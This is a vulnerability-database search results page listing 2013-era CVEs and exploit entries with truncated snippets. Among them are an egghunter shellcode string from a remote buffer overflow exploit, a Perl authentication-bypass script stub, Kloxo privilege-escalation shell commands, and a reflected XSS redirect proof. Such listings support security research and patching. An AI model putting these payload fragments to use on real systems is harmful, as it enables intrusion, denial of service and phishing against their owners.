3100 matches found
destoon backdoor vulnerability
No description provided by source...
FlashChat Arbitrary File Upload
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "FlashChat Arbitra...
CVE-2013-1439
The "faster LJPEG decoder" in libraw 0.13.x, 0.14.x, and 0.15.x before 0.15.4 allows context-dependent attackers to cause a denial of service (NULL pointer dereference) via a crafted photo file...
Router ONO Hitron CDE-30364 - CSRF Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability Date: 14-9-2013 Exploit Author: Matias Mingorance Svensson - matias.msatowasp.org Vendor Homepage:...
Router ONO Hitron CDE-30364 - Cross-Site Request Forgery
Router ONO Hitron CDE-30364 - Cross-Site Request Forgery Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability Date: 14-9-2013 Exploit Author: Matias Mingorance Svensson - matias.msatowasp.org Vendor Homepage:...
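A reflected XSS in Kingdee that allows nationwide phishing
Brief description: Found by accident. Details: I noticed it right at the start and originally thought it was harmless. But when I saw that the Kingdee sites for every city have it, I decided to submit it. Let me describe how I found it. First I went to an arbitrary address, for example binhai.kingdee.com. Then I saw an input box and tried injection right away, with no result. Then, when entering normal input, I saw this. Based on experience, I closed the title tag, and the effect appeared. Proof of vulnerability: binhai.kingdee.com/search/result.html?Submit=搜索&keyword=location.href="//www.eisoft.cc" For better ways to use it, use your imagination. .kingdee.com/search/result.html /...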
CVE-2013-4339
WordPress before 3.6.1 does not properly validate URLs before use in an HTTP redirect, which allows remote attackers to bypass intended redirection restrictions via a crafted string...
Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service
The Telnet server of Schneider Electric ETY Series Controllers has a security problem. We noticed that while we are connected to the PLC through telnet, if we call the telnet instance inside VxWorks again, it can cause the device to crash. The telnet instance name is tTelnetd which you can see in the...
SocialEngine 4.5 Shell Upload Vulnerability
SocialEngine version 4.5 suffers from a remote shell upload vulnerability. INTRODUCTION: The plugin has the objective of giving you a better visual for the user profile, and allows the addition of a cover image, keeping the layout closest to the...
StarUML - 'WinGraphviz.dll' ActiveX Buffer Overflow
Exploit Title: StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability Date: 03.8.2013 Exploit Author: d3b4g Vendor Homepage:http://staruml.sourceforge.net/en/ Software Link: http://staruml.sourceforge.net/en/ Tested on: Windows XP SP3 About StarUML -------------- StarUML is an open source...
Broadkam PJ871 - Authentication Bypass
Broadkam PJ871 - Authentication Bypass !/usr/bin/perl d3c0der use HTTP::Request; use LWP::UserAgent; print "= Target : "; $ip=; chomp $ip; print "= new password : "; $npass=; chomp $npass; if $ip ! /^http:/ $ip = 'http://' . $ip; if $ip ! //$/ $ip = $ip . '/'; print "\n"; print "-attacking , plz...
struts 2.3.15 command execution vulnerability
No description provided by source...
CVE-2013-4787
creationtimestamp | type | source
---|---|---
2013-07-03 00:00:00+00:00 | exploited | https://www.exploit-db.com/exploits/38627
2025-08-31 03:01:11+00:00 | seen | MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d
2025-08-31 03:12:49+00:00 | seen | MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57

...
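An unexpected SQL injection in the front end of the latest shopex version
Brief description: The core parts of the shopex code are all encrypted, so finding vulnerabilities takes a bit of imagination, for example this SQL injection... Details: It exists in user registration, an unexpected place, right? 1. /core/shop/controller/ctl.passport.php line 267 if !$info = $account-create$POST,$message ... 2. Seeing 1, I wondered whether $account-create might build the SQL statement with a foreach over $POST? 3. Looking at the table structure: I went ahead and added memberid to $POST when submitting as a test (in fact I also tried mobile and others while testing; I will only mention the useful field), and then got the figure below: Proof of vulnerability:...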
phpEventCalendar 0.2.3 - Multiple Vulnerabilities
phpEventCalendar v.0.2.3 Multiple Vulnerabilities ==================================================================== .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [email protected] , [email protected] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpcodeworks.com/pec/download...
PT-2013-41: Arbitrary Code Execution in Ajax File and Image Manager
The specialists of the Positive Research center have detected "Arbitrary Code Execution" vulnerability in Ajax File and Image Manager. Due to incorrect application architecture, validation of file extension is implemented after uploading file. Uploaded file will subsequently be removed if its...
Medium: kernel
Issue Overview: Heap-based buffer overflow in the tg3_read_vpd function in drivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6 allows physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via crafted firmware that specifies a lo...
phpcms 2007 onunload.inc.php page update-type injection, with EXP attached - bug warning - the black bar safety net
Downloaded a copy of phpcms 2007 for analysis; in module\movie\onunload.inc.php, found an update-type injection. query"UPDATE ". TABLEMOVIESERVER." SET num = num-1 WHERE serverid = $serverid AND num 0 "; ? $serverid is not filtered in any way and is also not enclosed in single quotation marks, so ignor...
Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF
Exploit for windows platform in category remote exploits !/usr/bin/python import socket import os import sys target="192.168.1.16" W00T egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"94...
Kloxo 6.1.6 - Local Privilege Escalation
Exploit for linux platform in category local exploits LXLABS=cat /etc/passwd | grep lxlabs | cut -d: -f3 export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECKGID=0 export NONRESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPTCOMMAND TMOUT" /tmp/w00trc echo "/usr/sbin/lxrestart...